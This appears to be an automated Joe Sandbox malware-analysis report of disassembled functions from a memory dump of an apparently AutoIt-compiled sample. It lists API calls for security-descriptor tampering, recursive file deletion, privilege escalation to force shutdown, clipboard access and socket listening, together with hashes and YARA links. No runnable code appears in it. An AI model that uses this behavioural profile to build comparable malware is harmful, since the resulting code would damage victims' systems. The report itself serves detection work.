Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: d962e4a2ed057d8052cf8d7860d143f571eff92921790831e5f1cfcbf8cd13b2
Instruction ID: 31be4ff8c5bae366d7aec8f0658dbc8fe96bae04dc8b2db1ae69ba4bb10e4af7
Opcode Fuzzy Hash: d962e4a2ed057d8052cf8d7860d143f571eff92921790831e5f1cfcbf8cd13b2
Instruction Fuzzy Hash: D0818B71209309AFD720DF14D884ABABFE6FF88354F00492DFA95972A1D772D901CB96

Function 006CB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006CB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 006CB903
Part of subcall function 006CB8E7: GetLastError.KERNEL32(?,006CB3CB,?,?,?), ref: 006CB90D
Part of subcall function 006CB8E7: GetProcessHeap.KERNEL32(00000008,?,?,006CB3CB,?,?,?), ref: 006CB91C
Part of subcall function 006CB8E7: RtlAllocateHeap.NTDLL(00000000,?,006CB3CB), ref: 006CB923
Part of subcall function 006CB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 006CB93A

Part of subcall function 006CB982: GetProcessHeap.KERNEL32(00000008,006CB3E1,00000000,00000000,?,006CB3E1,?), ref: 006CB98E
Part of subcall function 006CB982: RtlAllocateHeap.NTDLL(00000000,?,006CB3E1), ref: 006CB995
Part of subcall function 006CB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006CB3E1,?), ref: 006CB9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006CB3FC
_memset.LIBCMT ref: 006CB411
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006CB430
GetLengthSid.ADVAPI32(?), ref: 006CB441
GetAce.ADVAPI32(?,00000000,?), ref: 006CB47E
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006CB49A
GetLengthSid.ADVAPI32(?), ref: 006CB4B7
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006CB4C6
RtlAllocateHeap.NTDLL(00000000), ref: 006CB4CD
GetLengthSid.ADVAPI32(?,00000008,?), ref: 006CB4EE
CopySid.ADVAPI32(00000000), ref: 006CB4F5
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006CB526
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006CB54C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006CB560

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 0bf4fc944563859772bc0876dd6ed2c0eea6df1f4b9f33f845b63bb4202858d3
Instruction ID: 2b5da92ca33a21012f99e9d9f8f08b079b0b7dee9be36fd09d0c7ada183e8a66
Opcode Fuzzy Hash: 0bf4fc944563859772bc0876dd6ed2c0eea6df1f4b9f33f845b63bb4202858d3
Instruction Fuzzy Hash: 3B51F771900209ABDF14DFA5DC46EFEBBBAFF08300F14816DE915A6291DB359A05CF64

Function 006D6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 006931DA

Part of subcall function 006D7C0C: GetFileAttributesW.KERNEL32(?,006D6A7B), ref: 006D7C0D

_wcscat.LIBCMT ref: 006D6E7E
__wsplitpath.LIBCMT ref: 006D6E99
FindFirstFileW.KERNEL32(?,?), ref: 006D6EAE
_wcscpy.LIBCMT ref: 006D6EDD
_wcscat.LIBCMT ref: 006D6EEF
_wcscat.LIBCMT ref: 006D6F01
DeleteFileW.KERNEL32(?), ref: 006D6F0E
FindNextFileW.KERNEL32(00000000,00000010), ref: 006D6F22
FindClose.KERNEL32(00000000), ref: 006D6F3D

Strings

\*.*, xrefs: 006D6E78

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 3df8b84b4c689ab9e87f7e93e7df9d38f3c1af0226d55b94915d7aa89ff2a3ed
Instruction ID: 6aede5f06cb8f60214c9afc8091dfcdb89af0da6248d410c4d1ee98e835255dc
Opcode Fuzzy Hash: 3df8b84b4c689ab9e87f7e93e7df9d38f3c1af0226d55b94915d7aa89ff2a3ed
Instruction Fuzzy Hash: C421E3B2408344BEC220EBA4D8849DBBBDD9F59210F404E1FF5D4C3251EB34D64D87A6

Function 00695D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON

Download Yara Rule

Strings

CR), xrefs: 0069621D
LIMIT_MATCH=, xrefs: 006961EF
UTF16), xrefs: 00696193
ANYCRLF), xrefs: 00696279
LIMIT_RECURSION=, xrefs: 00696206
UCP), xrefs: 006961C1
CRLF), xrefs: 0069624B
ANY), xrefs: 00696262
BSR_ANYCRLF), xrefs: 00696290
LF), xrefs: 00696234
UTF), xrefs: 006961AA
BSR_UNICODE), xrefs: 00713885
NO_START_OPT), xrefs: 006961D8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-2893523900
Opcode ID: 23ae1697c08a9c77e90b2b0038122c2655941f6ee3e396f304a65baeeb938899
Instruction ID: bb12f8733cdbe71b7e479de604be7df7106f5b6cbae41800a4a2749eb03427ad
Opcode Fuzzy Hash: 23ae1697c08a9c77e90b2b0038122c2655941f6ee3e396f304a65baeeb938899
Instruction Fuzzy Hash: 59624DB1E002199BDF24CF59C8817EEB7B6BF48310F14816AE945EB6C1E7749E81CB94

Function 006E7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 006E72BB
EmptyClipboard.USER32 ref: 006E72C1
GlobalAlloc.KERNEL32(00000002,?), ref: 006E72D6
CloseClipboard.USER32 ref: 006E7375

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 8d7d9a914d02355ef6a5ba650604e18c3eca61bfaef1404e9c677c4df27b8d12
Instruction ID: 682fceebb288085649c825323a017e036f4af3deabefee01e5081aaf881b3db6
Opcode Fuzzy Hash: 8d7d9a914d02355ef6a5ba650604e18c3eca61bfaef1404e9c677c4df27b8d12
Instruction Fuzzy Hash: BB21D331604211AFDB10AF29DC19BAD77A9FF04721F00C019F909DB2A1DB78ED018F88

Function 006E24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006E24F6
Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 006E2526
_wcscmp.LIBCMT ref: 006E253A
_wcscmp.LIBCMT ref: 006E2555
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 006E25F3
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 006E2609

Strings

*.*, xrefs: 006E24D8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 4af4ab21330f7955c3f15661b9d1dd3f0869263deb6229721772a2516fcce5fe
Instruction ID: 52ec7bd066642ae7109219d6891a9b92fb79bf7e3d842e4dddb48d85f7dce079
Opcode Fuzzy Hash: 4af4ab21330f7955c3f15661b9d1dd3f0869263deb6229721772a2516fcce5fe
Instruction Fuzzy Hash: 8841817190135AAFCF61DFA5CD65AEE7BBAFF04310F10445AE415A2290E7309E84CF54

Function 00698CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00698FDD
ERCP, xrefs: 00698D68
VUUU, xrefs: 00698FCB
VUUU, xrefs: 0069900A
VUUU, xrefs: 0071C736

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 4c1577b1b5c850abe0332fabac37bf6af598198e23f80f997fa6ebbf2918435e
Instruction ID: 1f49ac17b958e9253617669c24377a50b3463e729e118bbfd69cac62d24326eb
Opcode Fuzzy Hash: 4c1577b1b5c850abe0332fabac37bf6af598198e23f80f997fa6ebbf2918435e
Instruction Fuzzy Hash: 04925C71A0021ACBDF25CF9CC8417EDB7B6BB54314F2481AAD859AB780E7749DC1CBA1

Function 00698530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON

Download Yara Rule

APIs

Part of subcall function 0069A2FB: _memmove.LIBCMT ref: 0069A33D

_memmove.LIBCMT ref: 00698672
_memmove.LIBCMT ref: 006986C2
_memmove.LIBCMT ref: 00698728

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ab8a2e2571859e0e3af4e839932247386e0b3e8c729333d031e27eca6fd400a5
Instruction ID: abf5d8cbac08c937fa0c449ee1cea5cde535b2aef1c0b3737a505b9074d4cf7f
Opcode Fuzzy Hash: ab8a2e2571859e0e3af4e839932247386e0b3e8c729333d031e27eca6fd400a5
Instruction Fuzzy Hash: B1127A71A00209DFDF44DFA4C985AAEB7FAFF49300F208569E406E7691EB39AD11CB54

Function 006FEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

Part of subcall function 006AB736: GetCursorPos.USER32(000000FF), ref: 006AB749
Part of subcall function 006AB736: ScreenToClient.USER32(00000000,000000FF), ref: 006AB766
Part of subcall function 006AB736: GetAsyncKeyState.USER32(00000001), ref: 006AB78B
Part of subcall function 006AB736: GetAsyncKeyState.USER32(00000002), ref: 006AB799

ReleaseCapture.USER32 ref: 006FEB1A
SetWindowTextW.USER32(?,00000000), ref: 006FEBC2
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006FEBD5
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 006FECAE

Strings

@GUI_DROPID, xrefs: 006FEC05
@GUI_DRAGFILE, xrefs: 006FEC49

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: 6820c2c798f1c31735a37d1a8c2f8fe197ba0c47d223fa2a8cbe746d745e98a4
Instruction ID: 4c50b641a5688643485fc5a2bf6ac47636a56f59dad1c04c26f7d3fa25af29c7
Opcode Fuzzy Hash: 6820c2c798f1c31735a37d1a8c2f8fe197ba0c47d223fa2a8cbe746d745e98a4
Instruction Fuzzy Hash: 46519A70104304AFD710EF24CC96FAA7BE6BB88755F40892DF695872E2CBB5A904CB56

Function 006D82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006CBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006CBF0F
Part of subcall function 006CBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006CBF3C
Part of subcall function 006CBEC3: GetLastError.KERNEL32 ref: 006CBF49

ExitWindowsEx.USER32(?,00000000), ref: 006D830C

Strings

@, xrefs: 006D82FF
SeShutdownPrivilege, xrefs: 006D82DA
, xrefs: 006D82FA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 64cdb320c6da16f2801d54394a8ead63ffa3aa85f1612ade1c67933a21cf6b59
Instruction ID: 109adcbf8df93eacf5bad2920fd8076e63b29da3d11f63a466479e4fcfc2eb2a
Opcode Fuzzy Hash: 64cdb320c6da16f2801d54394a8ead63ffa3aa85f1612ade1c67933a21cf6b59
Instruction Fuzzy Hash: 80018471E40315AEE76826AC8C4FFFB765AEB04B80F15442AF957D73D1DE649C0181A8

Function 006E91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006E9235
WSAGetLastError.WS2_32(00000000), ref: 006E9244
bind.WS2_32(00000000,?,00000010), ref: 006E9260
listen.WS2_32(00000000,00000005), ref: 006E926F
WSAGetLastError.WS2_32(00000000), ref: 006E9289
closesocket.WS2_32(00000000), ref: 006E929D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: dd07fcb5e93950d7adfc3ab58b9fe58a187ad467559a0d8d930017308fb3ddde
Instruction ID: ce266eefad64ee9d1299862a2887aa67c8280c055cf150604dc65e46f70e52bf
Opcode Fuzzy Hash: dd07fcb5e93950d7adfc3ab58b9fe58a187ad467559a0d8d930017308fb3ddde
Instruction Fuzzy Hash: 08218035600600AFCB10EF68C895BAE77AAAF44724F10C159F956AB3D1C774AD41CB65

Function 00696670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006967D0

Strings

hNt, xrefs: 0071216F
tMt, xrefs: 00712183

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: hNt$tMt
API String ID: 4104443479-1914866791
Opcode ID: 56455a392d950481d26aec08c225bfe03d34814859004431575dd33bfec01840
Instruction ID: d0f835681f528fd1a3b53a7d695001a6274e6665508663b65da18d6cfc611aa8
Opcode Fuzzy Hash: 56455a392d950481d26aec08c225bfe03d34814859004431575dd33bfec01840
Instruction Fuzzy Hash: 03A24A75E00219CFCF24CF58C4806EDBBB6BF48314F2581AAE859AB791D7749D82DB90

Function 0069A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON

Download Yara Rule

APIs

Part of subcall function 006B010A: std::exception::exception.LIBCMT ref: 006B013E
Part of subcall function 006B010A: __CxxThrowException@8.LIBCMT ref: 006B0153

_memmove.LIBCMT ref: 00703020
_memmove.LIBCMT ref: 00703135
_memmove.LIBCMT ref: 007031DC

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 5476ecb8e3a2673354e17c40333ae1f3b07e78b22e13fa363315daed1f985e67
Instruction ID: f81f3d930426307d4ef7b02149ca142de00388f14f05fcf07064656d55449b48
Opcode Fuzzy Hash: 5476ecb8e3a2673354e17c40333ae1f3b07e78b22e13fa363315daed1f985e67
Instruction Fuzzy Hash: 3E0294B0A00205DFDF44DFA8C9816AEB7FAEF49300F148069E806DB295EB35DE55CB95

Function 006E96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006EACD3: inet_addr.WS2_32(00000000), ref: 006EACF5

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 006E973D
WSAGetLastError.WS2_32(00000000,00000000), ref: 006E9760

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 80126c24f49a3e320b8e3a3f6f647fbd73a40692ff20119b7674a9f030e49a07
Instruction ID: 8bf3e0f2e77f1984838fb9d0f845dd482f4f10161fe6b0b3cc76c5fc2ddb790e
Opcode Fuzzy Hash: 80126c24f49a3e320b8e3a3f6f647fbd73a40692ff20119b7674a9f030e49a07
Instruction Fuzzy Hash: 3841C570A00204AFDB50AF68CC82EBE77EEEF49724F14845CF955AB3D2DA749D018B95

Function 006DF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006DF37A
_wcscmp.LIBCMT ref: 006DF3AA
_wcscmp.LIBCMT ref: 006DF3BF
FindNextFileW.KERNEL32(00000000,?), ref: 006DF3D0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 006DF3FE

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
